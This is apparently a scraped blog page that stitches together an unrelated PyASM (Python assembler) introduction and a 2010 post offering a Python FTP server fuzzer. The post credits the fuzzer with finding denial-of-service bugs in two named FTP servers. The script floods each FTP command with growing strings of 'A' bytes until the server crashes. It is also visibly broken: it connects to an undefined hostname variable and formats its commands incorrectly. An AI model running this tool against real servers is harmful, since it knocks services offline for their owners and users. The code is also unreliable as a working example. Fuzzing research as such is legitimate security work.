Introduction

PyASM is a full-featured dynamic assembler written entirely in Python. By dynamic, I mean that it can be used to generate and execute machine code in python at runtime without requiring the generation of object files and linkage. It essentially allow 'inline' assembly in python modules on x86 platforms.

PyASM can also generate object files (for windows) like a traditional standalone assembler, although you're probably better off using one of the many freely available assemblers if this is you primary goal.

Installation

PyASM requires python 2.4 or later. To the best of my knowledge, the only 2.4 specific feature I've used is from x import (a,b,c), but I need to draw a line in the sand somewhere as far as the installations I'll test and support.

Linux Install:

Download and extract pyasm-0.2.tar.gz
python setup.py install

Windows Install:

Download and run pyasm-0.2.win32-py2.4.exe
A source distribution pyasm-0.2.zip is available, but you'll need VS7.0 to compile the excmem module.

Hello World!

A simple Windows version of a hello_world.py program is as follows:



#
# Hello World in assembly: hello_World.py
#
#

from pyasm import pyasm

pyasm(globals(),r"""
!CHARS hello_str 'Hello world!\n\0'

!PROC hello_world PYTHON
!ARG  self
!ARG  args

   PUSH hello_str
   CALL PySys_WriteStdout
   ADD ESP, 0x4
   MOV EAX,PyNone
   ADD [EAX],1
!ENDPROC
""")

hello_world()

http://members.verizon.net/~olsongt/usersGuide.html

Friday, January 29, 2010

FTP Fuzzing - update

This is a simple FTP Server Fuzzer code in python
this script help you for hunting bug. example i find two vulnerability ftp:
XM Easy Personal FTP Server 5.8 Remote Denial Of Service XM-ftp-dos.txt
FtpXQ FTP Server 3.0 Remote Denial Of Service Exploit ftpxq-dos.txt

[+] you must usage python 2.x
[+] fix cmdtest loop


#!/usr/bin/python
import socket, sys, time
banner = """
##############################################
##        Iranian Pentesters Home           ##
##           Www.Pentesters.Ir              ##
##         PLATEN -[ H.jafari ]-            ##
## Sample Ftp Fuzzer version 0.1            ##
## Code by: PLATEN                          ##
## E-mail && blog:                          ##
## h-jafari.blogspot.com                    ##
## pl4ten[at]gmail[dot]com                  ##
## Greetings: Cru3l.b0y, b3hz4d, Cdef3nder  ##
## and all members in Pentesters.ir         ##
##############################################
"""
print banner
ip = raw_input("IP: ")
username = raw_input("Username: ")
passwd = raw_input("Password: ")
byetesize = raw_input("Max byte size: ")
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
cmdtest=["USER","PASS","LIST","MKD","ABOR","CWD","ACCT","NSLT","DELE","APPE","PORT","PASV","NOOP",
"AUTH","HOST","LANG","FEAT","RMD","SIZE","XRMD",",XPWD","XCRC","XCUP","TYPE","RNFR","QUIT"]
try:
  # if don't usage default port(21), change this.
  sock.connect((hostname, 21))
  r=sock.recv(1024)
  print "[+] " + r
except:
   print ("\n[-] Connection error!\n")
   sys.exit(1)
try:
  sock.send("user %s\r\n" %username)
except:
  print ("[-] Username  error!\n")
  sys.exit(1)
try:
  sock.send("pass %s\r\n" %passwd)
except:
  print ("[-] PassWord error!\n")
  sys.exit(1)

print "[+] Start Fuzzing...\n"
d = 1
for i in cmdtest :

  while d <= byetesize :
      payload= "\x41" * d
      print "[+] Send evil string" ,d,"\n"
      data = i +" %s\r\n"+payload
      sock.send( data )
      try:
          sock.connect((hostname, 21))
          d = d * 2
          time.sleep(0.5)
      except:
          sock.close()
          print "[+] Down!"
          sys.exit(0)